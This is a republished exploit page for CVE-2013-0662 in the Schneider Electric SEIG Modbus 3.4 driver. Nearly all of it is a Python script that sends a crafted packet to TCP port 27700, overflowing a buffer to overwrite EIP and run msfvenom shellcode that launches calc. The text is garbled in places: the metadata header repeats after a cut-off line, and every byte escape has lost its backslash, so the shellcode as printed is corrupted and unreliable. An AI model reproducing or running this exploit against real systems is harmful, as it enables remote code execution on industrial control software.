SEIG Modbus 3.4 Remote Code Execution

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 440

# Title: SEIG Modbus 3.4 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github # Title: SEIG Modbus 3.4 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows XP SP3
# CVE: CVE-2013-0662
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662

import socket
import struct

ip = "192.168.127.138"
port = 27700
con = (ip, port)

####### MESSAGE ##########
message_header = "x00x64"
message_buffer = "A" * 0x5dc
eip = struct.pack("<I", 0x7C9C167D)

# Shellcode generated with:
# msfvenom -a x86 --platform windows -p windows/exec cmd=calc -e x86/xor_call4 -f python
# Shellcode Size: 189 bytes
nopsleed = "x90" * 100 # x90 bad char bypass
shellcode = "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
shellcode += "x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
shellcode += "x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
shellcode += "x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
shellcode += "x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
shellcode += "xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
shellcode += "xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
shellcode += "xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
shellcode += "x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
shellcode += "x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
shellcode += "x5fx5ax8bx12xebx8dx5dx6ax01x8dx85xb2x00"
shellcode += "x00x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5"
shellcode += "xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0a"
shellcode += "x80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53"
shellcode += "xffxd5x63x61x6cx63x00"

message = message_header + message_buffer + eip + nopsleed + shellcode
print "Message Len: " + hex(len(message)) + " bytes"
##########################

######## PKG HEADER ######
header_padding = "x42x42"
header_buf_size = "xFFxFF"
header_recv_len = struct.pack(">H", len(message))
header_end = "x44"

header = header_padding + header_buf_size + header_recv_len + header_end
##########################

######## CRAFTING PAYLOAD ########
payload = header + message
print "Package Len: "+hex(len(payload)) + " bytes"
##################################

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(payload)